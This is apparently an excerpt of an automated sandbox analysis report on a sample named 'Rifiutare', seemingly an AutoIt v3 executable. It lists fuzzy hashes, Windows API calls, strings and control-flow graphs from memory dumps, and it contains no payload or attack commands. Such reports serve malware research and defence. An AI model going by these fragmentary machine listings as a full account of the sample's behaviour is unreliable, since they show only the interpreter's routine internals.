                                                                                • Instruction ID: 261760ba63b7357bab40a66155d2b29e6578c2578b5bb5e5b08c669aaf55647f
                                                                                • Opcode Fuzzy Hash: fc1b201582f2148833a866e6a6110cc36f7a050c3c17633bad3d88d62c17dd8b
                                                                                • Instruction Fuzzy Hash: EAF1DD316043409FCB14EF24C881BAEBBE5AF85314F18855DF89A9B2A2CB71ED44DB52
                                                                                APIs
                                                                                • GetInputState.USER32 ref: 00C3DD67
                                                                                • timeGetTime.WINMM ref: 00C3DF67
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C3E088
                                                                                • TranslateMessage.USER32(?), ref: 00C3E0DB
                                                                                • DispatchMessageW.USER32(?), ref: 00C3E0E9
                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C3E0FF
                                                                                • Sleep.KERNEL32(0000000A), ref: 00C3E111
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                • String ID:
                                                                                • API String ID: 2189390790-0
                                                                                • Opcode ID: 54a83d20c14f2b4c1879d55ac8d56227ca650606b3fa48928831a6dc14098942
                                                                                • Instruction ID: 49e59b0e22d50dadd03b702b9883b88146dc531db325fadd65d5a121fcbe60c8
                                                                                • Opcode Fuzzy Hash: 54a83d20c14f2b4c1879d55ac8d56227ca650606b3fa48928831a6dc14098942
                                                                                • Instruction Fuzzy Hash: 2D32E270614782AFD728DF24D888BAEB7E4BF45308F14452DE46B872D1C770EA84DB96

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00C335EA
                                                                                • RegisterClassExW.USER32(00000030), ref: 00C33614
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C33625
                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 00C33642
                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C33652
                                                                                • LoadIconW.USER32(000000A9), ref: 00C33668
                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C33677
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                • API String ID: 2914291525-1005189915
                                                                                • Opcode ID: 9876a61b155656922a08edb3682d722db9978fe86cf86d1e11270abe3c73afc0
                                                                                • Instruction ID: ea5dc39168ca0348cc156e44ad935e30f41c3d8055e34be94341e4cad714c2d1
                                                                                • Opcode Fuzzy Hash: 9876a61b155656922a08edb3682d722db9978fe86cf86d1e11270abe3c73afc0
                                                                                • Instruction Fuzzy Hash: 4421C0B5952318AFDB009FA4EC89BADBBB4FB08710F00412AF616E62A0D7B545448FA4

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 629 c70a7c-c70aac call c70850 632 c70ac7-c70ad3 call c65641 629->632 633 c70aae-c70ab9 call c62c25 629->633 639 c70ad5-c70aea call c62c25 call c62c38 632->639 640 c70aec-c70b35 call c707bb 632->640 638 c70abb-c70ac2 call c62c38 633->638 649 c70d9e-c70da4 638->649 639->638 647 c70b37-c70b40 640->647 648 c70ba2-c70bab GetFileType 640->648 651 c70b77-c70b9d GetLastError call c62c02 647->651 652 c70b42-c70b46 647->652 653 c70bf4-c70bf7 648->653 654 c70bad-c70bde GetLastError call c62c02 CloseHandle 648->654 651->638 652->651 658 c70b48-c70b75 call c707bb 652->658 656 c70c00-c70c06 653->656 657 c70bf9-c70bfe 653->657 654->638 668 c70be4-c70bef call c62c38 654->668 661 c70c0a-c70c58 call c6558a 656->661 662 c70c08 656->662 657->661 658->648 658->651 671 c70c5a-c70c66 call c709cc 661->671 672 c70c68-c70c8c call c7056e 661->672 662->661 668->638 671->672 678 c70c90-c70c9a call c68ace 671->678 679 c70c9f-c70ce2 672->679 680 c70c8e 672->680 678->649 681 c70ce4-c70ce8 679->681 682 c70d03-c70d11 679->682 680->678 681->682 685 c70cea-c70cfe 681->685 686 c70d17-c70d1b 682->686 687 c70d9c 682->687 685->682 686->687 688 c70d1d-c70d50 CloseHandle call c707bb 686->688 687->649 691 c70d84-c70d98 688->691 692 c70d52-c70d7e GetLastError call c62c02 call c65753 688->692 691->687 692->691
                                                                                APIs
                                                                                  • Part of subcall function 00C707BB: CreateFileW.KERNELBASE(00000000,00000000,?,00C70B25,?,?,00000000,?,00C70B25,00000000,0000000C), ref: 00C707D8
                                                                                • GetLastError.KERNEL32 ref: 00C70B90
                                                                                • __dosmaperr.LIBCMT ref: 00C70B97
                                                                                • GetFileType.KERNELBASE(00000000), ref: 00C70BA3
                                                                                • GetLastError.KERNEL32 ref: 00C70BAD
                                                                                • __dosmaperr.LIBCMT ref: 00C70BB6
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00C70BD6
                                                                                • CloseHandle.KERNEL32(?), ref: 00C70D20
                                                                                • GetLastError.KERNEL32 ref: 00C70D52
                                                                                • __dosmaperr.LIBCMT ref: 00C70D59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                • String ID: H
                                                                                • API String ID: 4237864984-2852464175
                                                                                • Opcode ID: e2b5a1f19bc4e1ecdea935222a4ce9a6c8674545f5cde915a1a8e2aa374d3650
                                                                                • Instruction ID: 8c19f2388b8fcba777ce3db060f555df40d059c72a032a17d550878408cc5ddb
                                                                                • Opcode Fuzzy Hash: e2b5a1f19bc4e1ecdea935222a4ce9a6c8674545f5cde915a1a8e2aa374d3650
                                                                                • Instruction Fuzzy Hash: D6A14732A10604DFDF29DF68C892BAE7BA1EF06320F284159F819DB3D1CB309912DB51

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00C34FF8: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00C74641,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00C35016
                                                                                  • Part of subcall function 00C34B95: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C34BB7
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C34F6F
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C748D8
                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C74919
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00C7495B
                                                                                • _wcslen.LIBCMT ref: 00C749C2
                                                                                • _wcslen.LIBCMT ref: 00C749D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                • API String ID: 98802146-2727554177
                                                                                • Opcode ID: c9fb71ce4ce7dea98eebe3c603febe4372fd5bda6a978d36679404a8fa1082b0
                                                                                • Instruction ID: 47f4351c86a91a5615c5765603960f655cfdf5f8d2a7cfd7ed2741ce3b8d5643
                                                                                • Opcode Fuzzy Hash: c9fb71ce4ce7dea98eebe3c603febe4372fd5bda6a978d36679404a8fa1082b0
                                                                                • Instruction Fuzzy Hash: 51719B715183019EC318EF69EC81A9BBBECFF48340F40452EF559C72A1EB719A49CB62

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00C33471
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00C33480
                                                                                • LoadIconW.USER32(00000063), ref: 00C33496
                                                                                • LoadIconW.USER32(000000A4), ref: 00C334A8
                                                                                • LoadIconW.USER32(000000A2), ref: 00C334BA
                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C334D2
                                                                                • RegisterClassExW.USER32(?), ref: 00C33523
                                                                                  • Part of subcall function 00C335B7: GetSysColorBrush.USER32(0000000F), ref: 00C335EA
                                                                                  • Part of subcall function 00C335B7: RegisterClassExW.USER32(00000030), ref: 00C33614
                                                                                  • Part of subcall function 00C335B7: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C33625
                                                                                  • Part of subcall function 00C335B7: InitCommonControlsEx.COMCTL32(?), ref: 00C33642
                                                                                  • Part of subcall function 00C335B7: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C33652
                                                                                  • Part of subcall function 00C335B7: LoadIconW.USER32(000000A9), ref: 00C33668
                                                                                  • Part of subcall function 00C335B7: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C33677
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                • String ID: #$0$AutoIt v3
                                                                                • API String ID: 423443420-4155596026
                                                                                • Opcode ID: ce2e3a05604a5f9b2579d0f7ac64304d0115517ff05a23f448f2210ae88b0c3a
                                                                                • Instruction ID: 36d5ba32465250334a60fe76933b4b419f020ed3529bed2e6870970a474e327b
                                                                                • Opcode Fuzzy Hash: ce2e3a05604a5f9b2579d0f7ac64304d0115517ff05a23f448f2210ae88b0c3a
                                                                                • Instruction Fuzzy Hash: 3F21EAB4D11314ABDB109FA5EC49BADBFB4FB48B54F00402EE509E63A0D7BA5540CFA0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 770 c37e80-c37ea3 771 c37ea9-c37f12 call c5022b call c362ad call c39091 call c362ad * 2 call c33195 770->771 772 c760c8-c760db call c9a072 770->772 806 c37f18-c37f25 call c32fe7 call c32e2b 771->806 807 c764fa-c7650a call c9a072 771->807 778 c760e2-c760ea 772->778 780 c760ec-c760f4 778->780 781 c760fa-c76102 778->781 780->781 784 c37f41-c37fb0 call c39091 call c4fca9 call c39091 call c350f7 call c4fb60 call c32f13 780->784 785 c76104-c7610b 781->785 786 c7610d-c76115 781->786 820 c76143-c7614e 784->820 821 c37fb6-c38025 call c39091 * 2 call c36052 call c34d30 SetCurrentDirectoryW call c3774c * 2 call c5022b call c33172 784->821 791 c76135-c7613e call c9d455 785->791 787 c76117-c7611e 786->787 788 c76120-c76128 786->788 787->791 788->784 793 c7612e-c76130 788->793 791->784 793->791 817 c37f2a-c37f3b call c32e14 806->817 813 c7650f 807->813 813->813 817->778 817->784 820->821 823 c76154-c76187 call c362ad call c32be0 820->823 867 c38029-c3802e 821->867 834 c76491-c764a8 call c9a072 823->834 835 c7618d-c761b4 call ca358a call c32c4e 823->835 843 c38175-c381c0 call c3774c * 2 call c362ad call c3774c call c362ad call c50234 834->843 835->834 848 c761ba-c76236 call c501fb call c38d73 call c38c8d 835->848 869 c763fe-c7643a call c38d73 call ca1328 call c94991 call c54d9e 848->869 870 c7623c-c7625e call c38d73 848->870 871 c38141-c38162 call c362ad SetCurrentDirectoryW 867->871 872 c38034-c38041 call c381e9 867->872 922 c7643c-c76461 call c3bfb0 call c50234 call ca1310 869->922 888 c76274-c7627f call ca142e 870->888 889 c76260-c7626f 870->889 871->843 885 c38164-c38172 call c501ed call c50234 871->885 872->871 884 c38047-c38063 call c37bb5 call c37c02 872->884 912 c764dd-c764f5 call c9a072 884->912 913 c38069-c38080 call c37ca2 call c54d83 884->913 885->843 904 c76281-c76297 888->904 905 c7629c-c762a7 call ca141a 888->905 893 c76390-c763a3 call c38c8d 889->893 893->870 910 c763a9-c763b3 893->910 904->893 918 c762bd-c762c8 call c37962 905->918 919 c762a9-c762b8 905->919 915 c763e6 call c9a3ce 910->915 916 c763b5-c763c3 910->916 912->871 939 c38082-c38099 call c567e5 913->939 940 c3809f-c380a4 913->940 924 c763eb-c763f8 915->924 916->915 923 c763c5-c763e4 call c37998 916->923 918->893 934 c762ce-c762ea call c99e55 918->934 919->893 922->843 923->924 924->869 924->870 947 c762ec-c76317 call c3c110 call c3774c 934->947 948 c76319-c7631c 934->948 939->940 957 c381c3-c381cd 939->957 944 c764be-c764c6 call c99d1d 940->944 945 c380aa-c380cc call c3c110 call c37cdd 940->945 964 c764cb-c764ce 944->964 965 c380d1-c380e3 945->965 994 c76345-c76356 call c38d73 947->994 954 c7631e-c76344 call c3c110 call c3bccb call c3774c 948->954 955 c76358-c7635b 948->955 954->994 962 c7635d-c76366 call c99d84 955->962 963 c7637c-c76380 call ca13b6 955->963 957->940 960 c381d3-c764b9 957->960 960->940 978 c76466-c7648f call c9a072 call c50234 call c54d9e 962->978 979 c7636c-c76377 call c50234 962->979 975 c76385-c7638f call c50234 963->975 970 c764d4-c764d8 964->970 971 c381dc-c381e4 964->971 972 c38100-c38102 965->972 973 c380e5-c380fc call c50234 call c501ed 965->973 970->971 983 c3812e-c3813b 971->983 984 c381d8 972->984 985 c38108-c3810b 972->985 973->972 975->893 978->922 979->870 983->867 983->871 984->971 985->971 993 c38111-c38114 985->993 993->964 999 c3811a-c38129 call c37998 993->999 994->975 999->983
                                                                                APIs
                                                                                  • Part of subcall function 00C362AD: CloseHandle.KERNELBASE(00000000,00000000,?,00C3111D,00CCDBF4), ref: 00C362CD
                                                                                  • Part of subcall function 00C33195: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,00C31153,?,00008000,00CCDBF4), ref: 00C331C3
                                                                                • SetCurrentDirectoryW.KERNELBASE(?,?,?,?,00000000), ref: 00C37FF4
                                                                                • _wcslen.LIBCMT ref: 00C38073
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C38151
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectory$CloseCreateFileHandle_wcslen
                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                • API String ID: 3350465876-3738523708
                                                                                • Opcode ID: 6384bd91138487bf59a575ed2ca3e09f4af26d9a48551bbbc0e00c0b0a9f878c
                                                                                • Instruction ID: 63ba217b5e45af6cb32f7f4e970044d288ff0ac06e84012317178a31b0af7f16
                                                                                • Opcode Fuzzy Hash: 6384bd91138487bf59a575ed2ca3e09f4af26d9a48551bbbc0e00c0b0a9f878c
                                                                                • Instruction Fuzzy Hash: 1412B1711183419FCB24EF24C881AAFBBE4BF95314F10491DF89A932A2DB71DA49DB53

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1008 c33c00-c33c15 1009 c33c17-c33c1a 1008->1009 1010 c33c75-c33c77 1008->1010 1012 c33c7b 1009->1012 1013 c33c1c-c33c23 1009->1013 1010->1009 1011 c33c79 1010->1011 1014 c33c60-c33c68 DefWindowProcW 1011->1014 1015 c33c81-c33c86 1012->1015 1016 c73fae-c73fd6 call c4f18d call c4f060 1012->1016 1017 c33cf5-c33cfd PostQuitMessage 1013->1017 1018 c33c29-c33c2e 1013->1018 1022 c33c6e-c33c74 1014->1022 1024 c33c88-c33c8b 1015->1024 1025 c33cad-c33cd4 SetTimer RegisterWindowMessageW 1015->1025 1051 c73fdb-c73fe2 1016->1051 1023 c33ca9-c33cab 1017->1023 1019 c33c34-c33c38 1018->1019 1020 c7401b-c7402f call c9c7a2 1018->1020 1026 c33cff-c33d0e call c4fd8b 1019->1026 1027 c33c3e-c33c43 1019->1027 1020->1023 1043 c74035 1020->1043 1023->1022 1031 c33c91-c33ca4 KillTimer call c33b82 call c353ce 1024->1031 1032 c73f4f-c73f52 1024->1032 1025->1023 1028 c33cd6-c33ce1 CreatePopupMenu 1025->1028 1026->1023 1033 c74000-c74007 1027->1033 1034 c33c49-c33c4e 1027->1034 1028->1023 1031->1023 1038 c73f54-c73f58 1032->1038 1039 c73f8a-c73fa9 MoveWindow 1032->1039 1033->1014 1049 c7400d-c74016 call c91351 1033->1049 1041 c33ce3-c33cf3 call c33d10 1034->1041 1042 c33c54-c33c5a 1034->1042 1046 c73f5a-c73f5d 1038->1046 1047 c73f79-c73f85 SetFocus 1038->1047 1039->1023 1041->1023 1042->1014 1042->1051 1043->1014 1046->1042 1052 c73f63-c73f74 call c4f18d 1046->1052 1047->1023 1049->1014 1051->1014 1057 c73fe8-c73ffb call c33b82 call c33df8 1051->1057 1052->1023 1057->1014
                                                                                APIs
                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00C33BFA,?,?), ref: 00C33C68
                                                                                • KillTimer.USER32(?,00000001,?,?,?,?,?,00C33BFA,?,?), ref: 00C33C94
                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C33CB7
                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00C33BFA,?,?), ref: 00C33CC2
                                                                                • CreatePopupMenu.USER32 ref: 00C33CD6
                                                                                • PostQuitMessage.USER32(00000000), ref: 00C33CF7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                • String ID: TaskbarCreated
                                                                                • API String ID: 129472671-2362178303
                                                                                • Opcode ID: b853586da68dfa61966639ca6475962fa3a8d79e76c6bb4230aef53e8244c371
                                                                                • Instruction ID: 935897d79af7da3e64351757bd7ba1da2fadfca772c6b54aae49afdb79cf294e
                                                                                • Opcode Fuzzy Hash: b853586da68dfa61966639ca6475962fa3a8d79e76c6bb4230aef53e8244c371
                                                                                • Instruction Fuzzy Hash: F241E530224288ABDB151F79FD4EB7D3A65EB04340F045329F91AE52E1CB75DB41A761

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1064 c363ce-c36407 1065 c74dc6-c74dc7 DestroyWindow 1064->1065 1066 c3640d-c36423 mciSendStringW 1064->1066 1069 c74dd2-c74ddf 1065->1069 1067 c36684-c36691 1066->1067 1068 c36429-c36431 1066->1068 1071 c36693-c366ae UnregisterHotKey 1067->1071 1072 c366b6-c366bd 1067->1072 1068->1069 1070 c36437-c36446 call c351e0 1068->1070 1074 c74de1-c74de4 1069->1074 1075 c74e0e-c74e15 1069->1075 1085 c74e1c-c74e28 1070->1085 1086 c3644c-c36454 1070->1086 1071->1072 1077 c366b0-c366b1 call c4ff16 1071->1077 1072->1068 1073 c366c3 1072->1073 1073->1067 1079 c74de6-c74dee call c362ad 1074->1079 1080 c74df0-c74df3 FindClose 1074->1080 1075->1069 1078 c74e17 1075->1078 1077->1072 1078->1085 1084 c74df9-c74e06 1079->1084 1080->1084 1084->1075 1090 c74e08-c74e09 call ca3bc8 1084->1090 1087 c74e32-c74e39 1085->1087 1088 c74e2a-c74e2c FreeLibrary 1085->1088 1091 c74e40-c74e4d 1086->1091 1092 c3645a-c3647f call c3d720 1086->1092 1087->1085 1093 c74e3b 1087->1093 1088->1087 1090->1075 1094 c74e74-c74e7b 1091->1094 1095 c74e4f-c74e6c VirtualFree 1091->1095 1101 c36481 1092->1101 1102 c364b6-c364c1 CoUninitialize 1092->1102 1093->1091 1094->1091 1100 c74e7d 1094->1100 1095->1094 1099 c74e6e-c74e6f call ca3c2e 1095->1099 1099->1094 1106 c74e82-c74e86 1100->1106 1104 c36484-c364b4 call c35145 call c35189 1101->1104 1105 c364c7-c364cc 1102->1105 1102->1106 1104->1102 1109 c74e97-c74ea4 call ca3c02 1105->1109 1110 c364d2-c364dc 1105->1110 1106->1105 1107 c74e8c-c74e92 1106->1107 1107->1105 1122 c74ea6 1109->1122 1113 c364e2-c36563 call c3774c call c361ba call c35228 call c50234 call c36214 call c3774c call c3d720 call c3523e call c50234 1110->1113 1114 c366c5-c366d2 call c4fb08 1110->1114 1126 c74eab-c74ecd call c501ed 1113->1126 1154 c36569-c3658d call c50234 1113->1154 1114->1113 1124 c366d8 1114->1124 1122->1126 1124->1114 1133 c74ecf 1126->1133 1136 c74ed4-c74ef6 call c501ed 1133->1136 1141 c74ef8 1136->1141 1144 c74efd-c74f1f call c501ed 1141->1144 1150 c74f21 1144->1150 1153 c74f26-c74f33 call c96cf0 1150->1153 1160 c74f35 1153->1160 1154->1136 1159 c36593-c365b7 call c50234 1154->1159 1159->1144 1164 c365bd-c365d7 call c50234 1159->1164 1163 c74f3a-c74f47 call c4ed4e 1160->1163 1169 c74f49 1163->1169 1164->1153 1170 c365dd-c36601 call c35228 call c50234 1164->1170 1171 c74f4e-c74f5b call ca3b5c 1169->1171 1170->1163 1179 c36607-c3660f 1170->1179 1177 c74f5d 1171->1177 1180 c74f62-c74f6f call ca3be3 1177->1180 1179->1171 1181 c36615-c36633 call c3774c call c35cf3 1179->1181 1186 c74f71 1180->1186 1181->1180 1189 c36639-c36647 1181->1189 1190 c74f76-c74f83 call ca3be3 1186->1190 1189->1190 1191 c3664d-c36683 call c3774c * 3 call c3702c 1189->1191 1196 c74f85 1190->1196 1196->1196
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00C36417
                                                                                • CoUninitialize.COMBASE ref: 00C364B6
                                                                                • UnregisterHotKey.USER32(?), ref: 00C3669B
                                                                                • DestroyWindow.USER32(?), ref: 00C74DC7
                                                                                • FreeLibrary.KERNEL32(?), ref: 00C74E2C
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00C74E59
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000007.00000002.1742302453.0000000000C31000.00000020.00000001.01000000.00000006.sdmp, Offset: 00C30000, based on PE: true
                                                                                • Associated: 00000007.00000002.1742251898.0000000000C30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CCD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742433362.0000000000CF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742573979.0000000000CFD000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000007.00000002.1742616192.0000000000D05000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_7_2_c30000_Rifiutare.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: af7106484b7fd1b24dd5ec82164a20e3fb4b8300b20ac06280dab60f400259a2
                                                                                • Instruction ID: 5ef2623d627e286817e1bddb5dac3426ce52c13365c98d2506048418a5eafdd2
                                                                                • Opcode Fuzzy Hash: af7106484b7fd1b24dd5ec82164a20e3fb4b8300b20ac06280dab60f400259a2
                                                                                • Instruction Fuzzy Hash: ABD18D71711212DFCB29DF54C895B29F7A4BF04714F2182ADE85AAB261CB30ED62DF90

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
